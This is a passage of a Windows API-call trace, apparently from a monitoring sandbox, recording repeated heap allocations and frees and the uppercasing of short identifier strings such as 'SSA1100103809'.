[0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa228 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0123.189] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0123.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0123.190] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0123.190] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0123.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0123.194] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0123.194] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0123.195] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0123.195] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0123.195] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0123.197] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.197] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0123.198] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0123.198] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa048 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0123.198] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0123.199] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0123.199] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0123.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0a8 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a740d0 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0123.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa498 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0123.200] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0123.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a740d0 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0123.201] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0123.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa0a8 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73fb0 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0123.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0123.202] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0123.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0123.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0123.202] RtlAllocateHeap 